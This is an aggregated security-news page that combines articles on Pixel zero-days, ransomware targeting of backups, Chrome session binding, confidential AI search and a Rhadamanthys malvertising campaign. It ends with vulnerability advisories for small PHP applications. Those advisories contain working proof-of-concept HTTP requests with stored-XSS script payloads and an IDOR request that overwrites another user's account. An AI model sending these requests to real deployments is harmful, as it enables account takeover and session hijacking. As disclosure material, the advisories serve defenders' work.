Google has disclosed that two Android security flaws impacting its Pixel smartphones have been exploited in the wild by forensic companies.
The high-severity zero-day vulnerabilities are as follows -

CVE-2024-29745 - An information disclosure flaw in the bootloader component
CVE-2024-29748 - A privilege escalation flaw in the firmware component

"There are indications that the [

Google Warns: Android Zero-Day Flaws in Pixel Phones Exploited by Forensic Companies

By Waqas
Storing a backup of your data is a wise decision, but have you considered keeping a backup of your backup?
This is a post from HackRead.com Read the original post: Sophos Reveals Ransomware Attacks Are Now Targeting Backups

New Sophos report reveals a problematic trend: ransomware attackers are increasingly targeting backups, crippling organizations’ ability to recover data and significantly raising ransom demands. Learn how to protect your backups and minimize the impact of a ransomware attack.

Ransomware attacks have become a reality for businesses of all scales worldwide, but a new report from cybersecurity firm Sophos reveals an even more disturbing trend: attackers are increasingly targeting backups.

Backup, as we know it, is one thing that keeps victim businesses from paying ransom to ransomware groups. However, the new tactic of targeting backup data cripples an organization’s ability to recover data without paying the ransom, seriously increasing the pressure to meet the demands of cybercriminals.

As observed before, companies such as Accenture and Bykea have thwarted ransomware attacks by leveraging backups and dismissing ransom demands. However, there have also been examples where the backup itself was encrypted.

The Sophos report (PDF), titled “The impact of compromised backups on ransomware outcomes,” is based on a survey of nearly 3,000 IT professionals whose organizations fell victim to ransomware attacks in the past year. The findings reveal a concerning reality, emphasizing the role of strong backup security in fighting cyber extortion.

****Near-Universal Backup Targeting:****

The report exposes the pervasiveness of backup targeting by attackers. A staggering 94% of surveyed organizations reported that attackers attempted to compromise their backups during the attack.

This attempt rate goes even higher in specific sectors, with government and media organizations experiencing a near-perfect 99% rate of attempted backup compromise.

****Compromised Backups, Soaring Costs:****

The effects of losing access to backups are harsh. The report found that organizations unable to recover data from backups due to the attack were forced to pay significantly higher ransoms.

On average, these organizations paid more than double the ransom amount compared to those with secure backups. This results in an average ransom demand of $2.3 million for those with compromised backups, compared to $1 million for those with secure backups.

****Importance of Backup Security:****

The Sophos report also emphasizes the role secure backups play in mitigating ransomware damage. Having a reliable, isolated backup system that’s not vulnerable to the initial attack allows organizations to restore data quickly and minimize downtime.

This not only reduces financial losses from operational disruptions but also weakens the attacker’s leverage, potentially leading to lower ransom demands or even complete avoidance of payment.

Commenting on this, Chad Graham, Manager of the Cyber Incident Response Team (CIRT) at Critical Start emphasised that regularly backing up data ensures business continuity and protects against cyber threats like ransomware.

“Performing backups for computer information systems is a crucial cyber risk mitigation strategy because it ensures the continuity of business operations and data integrity in the event of a cyberattack, system failure, or data corruption. Having offline backups is particularly important, as they are immune to online threats like ransomware attacks, which can encrypt or destroy online data,” Chad advised.

He further explained that “Despite its simplicity and effectiveness, the practice of regularly creating and updating backups is often overlooked, leading to significant vulnerabilities in an organization’s cybersecurity posture. This oversight can result in catastrophic data loss and operational downtime, emphasizing the necessity of incorporating backup strategies into comprehensive cybersecurity plans.”

****Investing in Cybersecurity Solutions:****

The report shows the importance of investing in security solutions against ransomware attacks that prioritize backup security. This includes implementing strong access controls, and offline backups that are physically isolated from the network.

1.  LockBit Ransomware Gang Returns, Taunts FBI
2.  ThreatHunter.ai Halts 100s of Attacks: Battling Ransomware
3.  Insights on Google Cloud Backup, Disaster Recovery Service
4.  Reddit hacked: Hackers steal full copy of old database backup
5.  Ransomware Attack Disrupts Services in 18 Romanian Hospitals

Sophos Reveals Ransomware Attacks Are Now Targeting Backups

Google on Tuesday said it's piloting a new feature in Chrome called Device Bound Session Credentials (DBSC) to help protect users against session cookie theft by malware.
The prototype – currently tested against "some" Google Account users running Chrome Beta – is built with an aim to make it an open web standard, the tech giant's Chromium team said.
"By binding authentication sessions to the

Google Chrome Beta Tests New DBSC Protection Against Cookie-Stealing Attacks

Fortanix is working on technologies to build a security wall around AI search.

The inner functioning of AI-powered search is more complex than plain-text search via Google when it comes to extracting answers from websites and databases. Fortanix is trying to build a security wall to protect the search query and the extraction of data from artificial intelligence (AI) systems.

Generative AI technologies will ultimately provide fine-grained responses based on associativity of information and retrieve information from sources users may not be aware of, says Richard Searle, vice president of confidential computing at Fortanix.

"What we're finding ... is that there is a deeper focus happening in the AI domain around privacy, consent, and permissioning of information," Searle says. "These are obviously the core cases."

Essentially, Fortanix is building a security wall around the way AI search queries are handled. More specifically, it is building security around prompts, where users provide AI search queries. The security wall extends to data retrieval from large language models, which are delivered to customers.

"We think there's a significant market there," Searle says. "The partners that we're working with within the AI space are talking about search to their customers already today."

Fortanix's private AI search is pinned on confidential computing, which creates secure vaults that are accessible to authorized parties only via keys. The data is processed inside, without leaving the vault.

"Data is going to be subject to not only the data protection regulations that we have today, but also these emerging AI regulations," Searle says.

Fortanix's technology is a component in the emerging field of confidential AI. Confidential AI is extended to AI scenarios typically associated with GPUs and accelerators, said Mark Russinovich, chief technology officer for Microsoft Azure, during a panel discussion at the Open Confidential Computing Conference in March.

**Protecting Vector Databases**

Private search with AI relies on data extraction from knowledge graphs or vector databases, which could draw information from a wide range of sources, including static conventional databases.

At Nvidia's GPU Technology Conference, also in March, the company's CEO, Jensen Huang, defined vector databases as a new style of database that takes structured data or unstructured data that can be reindexed by encoding the meaning of data.

"Now this becomes an AI database, and that AI database in the future, once you create it, you can talk to it," Huang said.

Fortanix's goal is to initiate privacy for the search initiator — a human or machine user — and protect the privacy and integrity of the information that might be within the vector embeddings.

"Confidential computing, I think, has a very important role to play," Fortanix’s Searle says.

**Private Search Differs From Conventional Search**

Confidential AI prevents the leak of AI information, which helps meet regulatory requirements. The layer also anonymizes the information so a user's intent or identity is protected. That is the opposite of conventional search, where user information and motives drive Google Ads and analytics.

A higher level of AI privacy is a cornerstone for industries such as healthcare and banking, which are tied to regulatory issues.

"Imagine that you want to do search in a scientific domain — you might want to be able to use data from a different institution to the one you're working in that has some specific expertise in a particular field. Showing the privacy of that data and the accuracy of this research is important," Searle says.

**State of Confidential AI**

Confidential AI is an emerging concept, and search fits into that profile. Intel and AMD have chips with hooks for secure enclaves. Microsoft, Google, and Amazon are providing confidential computing virtual machines in their cloud services.

Companies can bring data sets together to train a foundational model effectively, and these data sets are becoming high-value assets for top corporations, said Ian Buck, vice president and general manager of Nvidia's hyperscale and high-performance computing division, during the panel discussion.

The IT industry is rapidly approaching the deployment of confidential computing in data centers, edge computing, and PCs, but there's a lot more to do with confidential AI, said Greg Lavender, Intel's chief technology officer, during the panel.

"Privacy and safety and responsible AI are going to be big forcing functions for this as the government adopts AI technologies from the industry," he said.

**About the Author(s)**

Agam Shah has covered enterprise IT for more than a decade. Outside of machine learning, hardware, and chips, he's also interested in martial arts and Russia.

Fortanix Builds Private Search for AI

Campaign distributes malware disguised as legitimate installers for popular workplace collaboration apps by abusing a traffic-tracking feature.

Source: Bits and Splits via Shutterstock

Attackers are once again abusing Google Ads to target people with info-stealing malware, this time using an ad-tracking feature to lure corporate users with fake ads for popular collaborative groupware such as Slack and Notion.

Researchers from AhnLab Security Intelligence Center (ASEC) discovered a malicious campaign that uses a statistical feature to embed URLs that distribute malware, including the Rhadamanthys stealer, they revealed in a blog post published this week. The feature lets advertisers insert external analytic website addresses into ads to collect and use their visitors' access-related data to calculate ad traffic.

However, instead of inserting a URL for an external statistics site, attackers are abusing the feature to enter sites for distributing malicious code, the researchers found.

Ads related to the campaign have already been deleted. But when they were still active, "clicking on the banner would take unsuspecting users to the address that would trick them into downloading a malicious file," according to ASEC.

In the campaign, Rhadamanthys is disguised as an installer for popular groupware often used by corporate teams for workplace collaboration. Once the malware is installed and executed, it downloads malicious files and payloads from the attacker's server.

**Redirects to Stealer Downloads**

The ASEC post breaks down how attackers crafted the campaign to show banner ads that contain tracking URLs invisible to the end user that redirect users to an attacker-created and -controlled URL. This ultimate landing page is similar to the actual website of a groupware tool such as Slack or Notion, and it prompts visitors to download and execute the malware, which is distributed in an installer form.

Typical installers used by the campaign are the Inno Setup installer or Nullsoft Scriptable Install System (NSIS) installer; specifically, attackers used the following executable files: Notion\_software\_x64\_.exe Slack\_software\_x64\_.exe; Trello\_software\_x64\_.exe; and GoodNotes\_software\_x64\_32.exe.

"Once it is executed, the malware uses websites that can save texts such as textbin or tinyurl to access the malicious payload addresses," ASEC said in its blog post, which lists the URLs attackers used to fetch these addresses, which are subsequently delivered to users.

The ultimate payload of the campaign is the Rhadamanthys stealer, which gets injected into legitimate Windows files via the "%system32%" path, according to ASEC. This allows the stealer to exfiltrate users' private data without their knowledge, the researchers noted.

Rhadamanthys is popular with attackers and is available for purchase on the Dark Web under a malware-as-a-service model. It acts as a typical stealer to collect system information, such as computer name, username, OS version, and other machine details. It also queries the directories of installed browsers — including Brave, Edge, Chrome, Firefox, Opera Software — to search for and steal browser history, bookmarks, cookies, auto-fills, login credentials, and other data.

**Pay Attention to Ad-Delivered URLs**

The campaign is certainly not the first time that attackers have abused Google Ads and its associated features to deliver Rhadamanthys and other malware, and it likely won't be the last. In fact, a campaign identified in January 2023 also used website redirects from Google Ads and fake-download lures for popular remote-workforce software, such as Zoom and AnyDesk to deliver Rhadamanthys.

Attackers have even abused the "dynamic search ads" feature of the service to amplify the effect of malicious campaigns by creating targeted ads to deliver a flood of malware.

Indeed, as "all search engines that provide tracking to calculate ad traffic can be used to distribute malware," users must stay vigilante when accessing links from ads delivered by Google, ASEC warned. Specifically, they should "pay attention to the URL that is seen upon accessing the website, not the URL that is shown on the ad's banner" to avoid falling for a malicious campaign, according to the post.

ASEC also posted a comprehensive list of URLs associated with various stages of the campaign to help administrators identify if any corporate users have been affected by it.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Attackers Abuse Google Ad Feature to Target Slack, Notion Users

Computer Laboratory Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3140

# Vulnerable code section:

foreach($_POST as $k => $v){  
    $v = $this->conn->real_escape_string($v);  
    if(in_array($k, $main_field)){  
        if(!empty($data)) $data .= ", ";  
        $data .= " `{$k}` = '{$v}' ";  
    }  
}

- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

# Vulnerability Description:

- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571  
Content-Length: 946  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="id"

8  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="firstname"

staff2  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="middlename"

<script>alert(1)</script>  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="lastname"

asd  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="username"

staff  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="password"

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

-----------------------------381104392340117332004262429571--

- In this POST request, an attacker has included a script tag in the "middlename" field:

<script>alert(1)</script>

- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.

# Impact:

- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/xss_1.md  
https://vuldb.com/?id.258915  
https://www.cve.org/CVERecord?id=CVE-2024-3140

Computer Laboratory Management System 1.0 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3139

# Vulnerable code section:

if(!empty($_FILES['img']['tmp_name'])){  
    if(!is_dir(base_app."uploads/avatars"))  
        mkdir(base_app."uploads/avatars");  
    $ext = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION);  
    $fname = "uploads/avatars/$id.png"; // The $id value is directly used in the file path  
    // Rest of the code  
}

# Vulnerability Description:

This vulnerability exists in the section of code responsible for handling file uploads. The $id variable, obtained from user input ($_POST), is utilized directly in constructing the file path without appropriate validation or authorization checks, leading to both IDOR and account takeover vulnerabilities. This allows an attacker to manipulate the $id parameter to access and modify files of other users, including administrators.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1P0Vg_sYM9S43_rJTe1l5E2Vt9gzvb0YX/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38244968796537297751592545024  
Content-Length: 8393  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="id"

7  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="firstname"

testtt  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="middlename"

testMiddle   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="lastname"

te Last Name   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="username"

admin2  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="password"

qwe123  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="img"; filename="hack.png"  
Content-Type: image/png

PNG  
...

- Response:

HTTP/1.1 200 OK  
Date: Mon, 01 Apr 2024 10:19:19 GMT  
Server: Apache/2.4.54 (Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev  
X-Powered-By: PHP/8.2.0  
X-Xdebug-Profile-Filename: c:/wamp64/tmp\trace.localhost.1711966759.10780.cgrind  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 1  
Connection: close  
Content-Type: text/html; charset=UTF-8

1

# Impact:

This vulnerability allows attackers to access and modify user data and profile pictures, leading to potential phishing, distribution of malicious content, and reputational damage. Additionally, unauthorized access to administrator accounts can occur, resulting in the compromise of sensitive information. This poses a significant risk to the security and usability of the application.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/idor%2Baccaunt_takeover.md  
https://vuldb.com/?id.258914  
https://www.cve.org/CVERecord?id=CVE-2024-3139

Computer Laboratory Management System 1.0 Insecure Direct Object Reference

Hospital Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://code-projects.org# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/# Version: v1.0# Tested on: Windows 10# CVE : CVE-2024-29412# Description: Stored Cross Site Scripting vulnerability inHospital Management System - v1.0 allows an attacker to execute arbitrarycode via a crafted payload to the 'patient_id','first_name','middle_initial' ,'last_name'" in /receptionist.php component.# POC:1. Go to the User Login page: "http://localhost/HospitalManagementSystem-gh-pages/2. Login with "r1" ID which is redirected to "http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"endpoint.3. In Patient information functionality add this payload"><script>alert('1')</script> ,in all parameter.4. click on submit.# Reference:https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md

Hospital Management System 1.0 Cross Site Scripting

E-Insurance version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html# Version: v1.0# Tested on: Windows 10# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -v1.0 allows an attacker to execute arbitrary code via a crafted payload tothe Firstname and lastname parameter in the profile component.# POC:1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile2. In fname & lname parameter add payolad"><script>alert("Hacked_by_Sandy")</script>3. click on submit.# Reference:https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md

Tag

#google